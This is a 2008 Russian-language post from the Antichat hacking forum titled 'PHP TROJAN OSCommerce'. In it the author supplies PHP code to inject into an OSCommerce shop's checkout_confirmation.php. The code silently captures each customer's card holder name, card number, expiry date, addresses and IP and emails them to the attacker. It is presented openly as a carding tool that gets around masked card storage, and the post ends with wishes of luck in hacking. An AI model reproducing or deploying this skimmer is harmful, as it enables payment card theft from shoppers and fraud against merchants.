ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу PHP TROJAN OSCommerce
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

PHP TROJAN OSCommerce
  #1  
Старый 02.11.2008, 20:10
vp$
Участник форума
Регистрация: 22.10.2007
Сообщений: 138
Провел на форуме:
2454040

Репутация: 177
Отправить сообщение для vp$ с помощью ICQ
По умолчанию PHP TROJAN OSCommerce
OSCommerce один из самых популярных движков для онлайн магазинов
в нем есть встоенный модуль для оплаты кредитными картами, который является лакомым куском для хакеров и кардеров
но все чаще встречаются всяческие способы защиты приватных данных, в случае исли злоумышленник все таки получил доступ к базе данных, то остался с носом, вот наглядный пример
номер карты закрыт в середине крестиками

именно для таких случаев я написал небольшой код, который будет перехватывать важную информацию

теперь имея доступ к файлам магазина, необходимо найти файл checkout_confirmation.php (он обычно находится в корневой папке шопа) и в ставить следующий код после открывающего тэга body:
PHP код:
<?
error_reporting (0);
$ip_holder $_SERVER['REMOTE_ADDR'];
$tr_deliv_adr tep_address_format($order->delivery['format_id'], $order->delivery1' '' ');
$tr_bill_adr tep_address_format($order->billing['format_id'], $order->billing1' '' ');
$tr_cc_owner $_POST["cc_owner"];
$tr_cc_number$_POST["cc_number"];
$tr_cc_expires_month $_POST["cc_expires_month"];
$tr_cc_expires_year$_POST["cc_expires_year"];
$info_body "Delivery Address: ";
$info_body .= $tr_deliv_adr."\n";
$info_body .= "----------------------------------\n";
$info_body .= "Billing Address: ";
$info_body .= $tr_bill_adr."\n";
$info_body .= "----------------------------------\n";
$info_body .= "IP holder: ".$ip_holder."\n";
$info_body .= "CC holder: ".$tr_cc_owner."\n";
$info_body .= "CC num: ".$tr_cc_number."\n";
$info_body .= "EXP: ".$tr_cc_expires_month."/".$tr_cc_expires_year."\n";
mail("your@mail.com",'!!! NEW CC !!!',$info_body,"onlineshop.com\r\n");
?>
теперь после каждой совершенной оплаты кредитной картой, на ваше мыло your@mail.com будет высылаться вся необходимая информация


P.S. данный код написан под модуль без использования CVV
P.P.S удачи в хеке
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP, PERL, MySQL, JavaScript 186 21.02.2010 02:41
Что такое Php? PAPA212 Болталка 13 28.12.2007 20:44
Безопасность в Php, Часть Iii k00p3r Чужие Статьи 0 11.07.2005 19:02
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ